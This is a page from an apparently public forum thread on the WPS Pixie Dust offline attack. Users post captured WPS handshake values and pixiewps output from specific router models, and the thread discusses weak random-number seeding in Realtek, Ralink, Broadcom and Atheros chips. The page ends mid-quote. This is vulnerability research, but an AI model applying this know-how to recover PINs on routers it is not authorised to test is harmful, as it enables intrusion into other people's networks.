Page 9 of 12 FirstFirst 123456789101112 LastLast
Results 401 to 450 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #401
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by emsef View Post
    Hello and thanks for the info.

    The following router is vulnerable

    Code:
    [P] WPS Manufacturer: BUFFALO INC.
    [P] WPS Model Name: WBMR-HP-GN
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN
    Thanks buddy, added to the database Keep up the testing and paste any vulnerable/non vulnerable devices with all the request info if possible A big thanks to the community! Wouldn't have been inspired without you!

  2. #402
    Quote Originally Posted by dragood
    the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which really not much of "hacking". the only problem we are facing now, is someone needs to know how to write a code to find the state of the PRNG,
    Hi there!
    You missed some points.
    In his presentation diominique spoke about 2 flows:
    1) ES-1=ES-2=0 and that is just for Ralink Chipset and was indeed the first stuff that was coded (because, indeed, it doesn't requires extra brute force of seed)
    2) Then wiire found the way to code the second breach revealed by Dominique : some broadcom devices for which we know the "interval" used to define the seed (cracked inmediatly)
    In the meantime soxrok2212 sent to dominique datas form realteck chipsets because we saw that the same PKE was used in his two routers and in my two routers with realtek... all four routers from different manufacturer with different firmwares (but all is coming form the SDK for rtl819x project that developer uses to build their firmware)
    And dominique foiund out a third breach
    3) for this Realtek chipsets the exact time in seconds is used as a seed in DH exchange key process - or it is the time of the last build.( brute force required from exact time (in seconds) to 1970 < don't ask me why for some router it was found that 1970 was used as seed )
    wiire coded everything and we have all the stuff in the hand to "pixie-dust" and also to create a custom code to try a different interval.
    cheers

  3. #403
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Invulnerable
    Code:
    [P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
    [P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd:3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:bf:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3:6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec:83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:33:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6:fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0:4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c:4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54:14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:eb:8e:c1:39:0a:d8:2f:c9:72
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: Wi-Fi Protected Setup Router
    [P] WPS Model Number: RT-AC56U
    [P] Access Point Serial Number: d8:50:e6:da:0f:08
    [P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78
    [P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b:62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:af:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58:80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db:53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:af:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b:49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5:cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85:82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71:59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:90:ab:37:3a:8b:cc:43:5b:3e
    [P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58:7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a
    [P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89:f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92
    [P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e:c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad
    Invulnerable
    Code:
    [P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: 
    [P] WPS Model Name: Wireless N Router
    [P] WPS Model Number: DIR-501
    [P] Access Point Serial Number: 20070413-0001
    [P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b
    [P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74:ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:56:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17:3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c:7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45:ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6:0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:ae:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02:5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0:d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a0:8c:80:80:25:74:ae:a6:40
    [P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f:ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13
    [P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f:6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b
    [P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7:e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d

  4. #404
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by WaLkZ View Post
    Invulnerable
    Code:
    [P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
    [P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd:3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:bf:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3:6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec:83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:33:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6:fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0:4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c:4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54:14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:eb:8e:c1:39:0a:d8:2f:c9:72
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: Wi-Fi Protected Setup Router
    [P] WPS Model Number: RT-AC56U
    [P] Access Point Serial Number: d8:50:e6:da:0f:08
    [P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78
    [P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b:62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:af:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58:80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db:53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:af:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b:49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5:cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85:82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71:59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:90:ab:37:3a:8b:cc:43:5b:3e
    [P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58:7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a
    [P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89:f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92
    [P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e:c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad
    Invulnerable
    Code:
    [P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: 
    [P] WPS Model Name: Wireless N Router
    [P] WPS Model Number: DIR-501
    [P] Access Point Serial Number: 20070413-0001
    [P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b
    [P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74:ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:56:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17:3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c:7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45:ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6:0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:ae:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02:5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0:d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a0:8c:80:80:25:74:ae:a6:40
    [P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f:ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13
    [P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f:6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b
    [P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7:e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d
    Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?

  5. #405
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Hey community, someone has recently brought to my and Wiire's attention an Atheros device that produces a strange E-Nonce, it follows this pattern:
    Code:
    xx:xx:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    where x is a hex character obviously (0-9, a-f).

    It has occurred many times over different exchanges. It has happened in AR9130/AR9102 devices.

    If E-S1 and E-S2 follow the same pattern, it would be a relatively fast crack for those chips, faster than the full Realtek bruteforce. It is not yet know if this is the case, but if anyone would like to contribute some data it couldn't hurt!

    On the other hand, another Realtek chip was discovered to not use the time since Epoch PRNG, but it still follows the static PKE AND the E-Nonce follows a pattern like this:
    Code:
    xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00
    It is a SoC, the RTL8671. Being a SoC, it might use a different PRNG but it may be just as vulnerable, if not even more vulnerable. There are a few people including me that are actively looking into it. I hope we find something soon!
    Last edited by soxrok2212; 2015-06-03 at 16:53.

  6. #406
    Join Date
    2015-Jun
    Posts
    1
    Quote Originally Posted by soxrok2212 View Post
    Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?
    Hello

    For me dir501 also not working.
    [P] E-Nonce: 51:a5:44:af:03:06:4e:0f:3e:c0:0b:b9:09:1b:c3:2c
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer:
    [P] WPS Model Name: Wireless N Router
    [P] WPS Model Number: DIR-501
    [P] Access Point Serial Number: 20070413-0001
    [+] Received M1 message
    [P] R-Nonce: 4f:2b:f6:b7:08:bc:59:51:d7:b0:11:cb:0f:dd:8c:db
    [P] PKR: 86:de:bf:e6:4a:ff:74:40:45:0f:91:5d:ff:a6:34:69:9e :1c:97:93:2e:48:c5:14:94:66:bd:f9:8b:59:44:4d:cc:9 7:bb:8e:41:f2:9f:47:f2:e1:f0:ad:2b:01:f7:1b:cb:04: 60:bd:d5:42:87:4d:75:dd:58:6c:6a:74:b5:c8:65:1d:09 :32:20:0b:e2:39:e9:49:1c:29:8a:d1:9f:18:bc:4b:7e:4 d:bd:db:e4:b9:9d:65:59:dd:51:c3:9d:9b:3e:5f:26:a1: 76:85:bd:4e:fc:de:ac:78:0d:57:f5:72:22:f7:16:9f:b8 :a7:f4:2c:4b:37:c8:3f:5f:9c:58:45:61:de:7b:17:ae:0 a:c8:e1:c3:30:a0:3c:7a:0d:e2:d8:9f:fe:04:a7:c3:7a: 42:c4:22:6a:32:02:2d:e5:ea:12:47:7c:06:1f:f4:62:11 :94:e4:09:3f:a3:8a:76:44:88:ed:fb:a4:ff:8b:0f:2a:0 c:b6:06:e0:0b:ca:05:ff:07
    [P] AuthKey: 41:64:d3:91:09:11:8b:d1:f7:ec:21:6f:29:69:48:ba:0e :1e:9b:3e:26:c5:60:41:27:a9:69:da:12:7f:59:6e
    [+] Sending M2 message
    [P] E-Hash1: f6:63:0a:dd:2a:0c:e6:e3:e0:0d:76:98:35:6a:c9:14:89 :a8:3d:67:3b:5d:d2:08:ac:62:24:15:f7:e8:3d:8d
    [P] E-Hash2: 76:29:da:24:1a:d8:d4:1b:b9:b4:c9:5f:3b:1c:19:28:81 :96:7a:40:f9:ac:d0:95:43:96:96:85:3c:18:49:d0
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.


    tried also with pixiewps force. If you need some more testing please feel free to contact me.

  7. #407
    Join Date
    2015-Apr
    Posts
    15
    Here's a D-Link 501 (Version B) which works with --force :

    Code:
    [P] E-Nonce: 50:37:4c:db:7a:3c:16:90:4b:57:6a:43:61:c2:85:01
    [P] R-Nonce: ae:9b:f2:26:29:23:38:17:0f:d3:7f:bd:92:fb:2d:3b
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: b5:4a:f2:45:95:44:27:92:f4:8b:65:05:6f:88:83:ff:d3:20:fe:d9:ed:d8:e1:f0:52:3d:a9:95:2a:97:33:53:f4:72:66:30:83:90:8c:3c:58:81:ce:9f:7d:31:1b:04:a2:d2:ca:a6:7b:06:ca:15:97:f4:a5:e9:f5:ef:2e:2b:b7:fc:33:1c:f7:44:01:80:20:a2:49:f4:54:5e:9d:11:49:e3:39:16:0e:45:e9:08:4d:7a:75:47:a0:a6:d1:4d:9e:ee:4a:d0:69:e4:23:ef:5d:9f:d1:4b:34:19:ed:b4:77:95:81:3d:8a:6c:64:a3:f8:5d:d4:b1:89:00:da:65:9b:11:2b:20:5d:36:49:79:a9:25:b2:b6:26:0e:51:45:eb:4c:4a:f3:f1:b3:ac:e9:67:0a:fe:9a:b6:c8:60:75:a6:1f:2a:9b:51:1f:e2:34:b0:78:64:f5:55:25:93:8b:37:d5:cf:74:fd:25:bd:43:cb:e4:e0:c7:a7:71:cf:8c
    [P] AuthKey: 8e:7d:72:ef:1d:c3:ee:c5:4a:68:56:10:d5:60:d0:0b:62:9c:d9:b1:2d:a0:a7:5c:da:81:38:fe:a4:b9:6b:4a
    [P] E-Hash1: 90:b1:29:cf:44:fd:09:3a:74:7e:e1:fb:17:51:52:85:1a:41:26:30:bb:23:44:5d:53:b5:46:c4:5c:fa:1c:19
    [P] E-Hash2: 43:d8:2a:15:c0:85:82:dc:32:1b:bf:04:47:15:73:56:fa:4a:f1:1c:13:6b:db:7a:0d:2e:fd:aa:37:96:44:7b

  8. #408
    Join Date
    2015-May
    Posts
    3
    I have a Netgear R3600v2, router. Broadcom chipset BCM4360. Doesnt seem to be working. I can send .cap if you want/need. Doing brute force now

  9. #409
    Join Date
    2015-May
    Posts
    3
    Netgear R3600v2 Broadcom BCM4360, doesnt seem to be working

    E-Nonce: 5b:44:ac:16:26:6f:78:42:7a:9b:b7:91:60:c5:62:87
    [P] PKE: 01:fb:e7:b0:80:43:cc:24:6d:f6:9d:b8:9a:89:0e:d0:bb :0e:57:10:c9:d3:bc:c1:e8:a0:df:e6:61:3e:e9:4a:9f:7 0:cb:ac:0b:71:7a:0e:bd:10:2d:83:c2:a8:b4:c4:3c:53: 04:7e:a7:17:13:43:81:9a:6b:f6:b7:d6:0e:32:bb:bf:33 :ce:2e:ca:b6:1f:c3:48:39:77:69:63:80:99:11:78:0d:f 7:0c:39:3d:4c:87:fa:c7:22:9d:97:41:11:f7:c9:b5:20: 09:01:0b:4b:12:2c:88:cb:99:53:11:69:2f:48:3a:2d:f9 :8b:d6:20:7c:84:a5:b0:ad:71:12:4d:46:29:74:66:58:7 c:f7:fe:52:92:6c:e7:86:41:b5:20:e4:e6:b9:64:95:c6: 08:f5:c4:e1:5c:7e:bf:51:a3:e2:da:17:d9:d7:b5:38:be :a5:4f:30:e8:bb:10:51:f6:78:27:0d:51:1d:49:c3:38:2 a:3a:a8:2b:05:6c:72:80:49
    [P] WPS Manufacturer: NETGEAR, Inc.
    [P] WPS Model Name: R6300v2
    [P] WPS Model Number: R6300v2
    [P] Access Point Serial Number: 679
    [+] Received M1 message
    [P] R-Nonce: 2c:2a:4b:27:57:1d:b5:5f:6a:90:f0:9d:26:b7:10:28
    [P] PKR: 43:4b:29:6c:ff:cb:c9:6f:5c:f6:6e:2c:35:25:8b:e8:a4 :1b:bc:b2:df:a8:10:8b:72:c6:b8:a2:0b:97:76:e4:47:6 6:6a:11:7a:b0:fd:75:3f:cd:17:8f:16:c6:7e:44:cd:aa: f8:fb:0f:91:80:e6:2c:31:91:a9:a5:84:4a:4a:de:31:c1 :65:1e:a6:57:28:41:91:3d:11:dc:81:2c:af:b9:2f:8b:e e:41:1c:3b:05:61:03:0b:07:b0:10:b6:90:25:09:fd:e9: 4e:ec:bb:f5:49:8f:5c:e1:7f:43:b8:e8:70:2c:cc:db:bd :6d:a4:12:3b:b6:1a:f5:dc:43:11:68:11:9e:eb:d2:67:b 5:ea:58:7f:f9:6a:63:f2:a6:f6:21:ed:06:9f:2e:42:41: e9:18:d6:a2:7d:b5:3e:1b:04:12:eb:de:c6:05:5b:40:a5 :02:b1:1a:54:6d:a6:b2:3f:71:5e:8a:b3:77:f4:b4:66:f 7:f5:75:3c:a2:31:8e:dd:b3
    [P] AuthKey: 52:fd:cb:ad:ec:b8:a5:a5:5b:79:38:ca:c6:c5:8c:ef:5f :8b:be:6a:61:4c:b5:e0:19:a1:39:bf:84:fd:a4:18
    [+] Sending M2 message
    [P] E-Hash1: f3:27:0d:b1:97:6d:ba:83:18:25:44:d8:0f:34:64:09:da :ce:7c:19:b9:89:87:62:98:41:17:45:3d:e4:db:63
    [P] E-Hash2: d7:5b:14:f3:a1:43:d2:0b:3c:59:07:ae:ee:c4:dc:2a:32 :a2:a4:fa:18:e5:b5:20:52:c5:85:dc:27:a6:84:6b

  10. #410
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Most Broadcom chipsets are not vulnerable because they run linux which uses a cryptographically secure method of generating random keys with good sources of entropy... it's pretty much completely unpredictable as of right now. In the future, something could certainly be found but not right now. The only Broadcom devices that will work are devices the run eCos which are typically found in DSL/Wireless gateway modems or Cable modem/Gateways.

  11. #411
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
    1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:
    Code:
    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    Well, it turns out that this device also has a static PKE!
    Code:
    91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9:bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:80:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e:84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0:69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:68:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5:23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47:0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd:07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc:7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:97:e8:40:2f:9b:97:d1:7e:7e
    I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either. Here is a list with all devices that use the AR9285 chip[/url] so the community can look to see if their devices follow the same pattern.

    2- Another strange thing is happening with Atheros, specifically in the Linksys WRT160NL. This is one of Linksys's devices that is completely open source, meaning it runs Linux. This WRT160NL has a AR9130/AR9102 chipset. The strange thing here is that the Enrollee Nonce follows a strange pattern:

    Code:
    XX:XX:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    Usually, E-S1 and E-S2 are generated right after the Enrollee Nonce, so I'd bet there is some sort of issue here. Here is a download link for the open source firmware and a list of AR9130/AR9102 devices for comparison against other devices.

    3- Finally, another user pointed out a different Realtek chipset, the RTL8671 (as well as other SoC DSL/Wireless modems. I assume that since this chip is SoC, it may use a different PRNG. The nonces follow another strange pattern that as of right now we haven't been able to determine. Here is the pattern:

    Code:
    00:00:XX:XX:00:00:XX:XX:00:00:XX:XX:00:00:XX:XX
    There is a device that has been confirmed to follow this pattern, a DIGISOL DG-BG4100NU. The firmware can be downloaded and extracted with binwalk here, and the source code for the RTL8186 chip can be found here.

    --I already know that Wiire, Datahead and I are looking into these but they are both very busy and I don't know enough C to read code and understand it completely. T6_x is also looking into some interesting stuff as well. I'm coming back to the community looking for help! Maybe we can do this one without Bongard! That is my goal this time, and it probably doesn't help to make this public but thats alright! Leave a reply if you have any questions or comments and thanks in advance!
    Last edited by soxrok2212; 2015-06-10 at 04:26.

  12. #412
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by soxrok2212 View Post
    Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
    1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:
    Code:
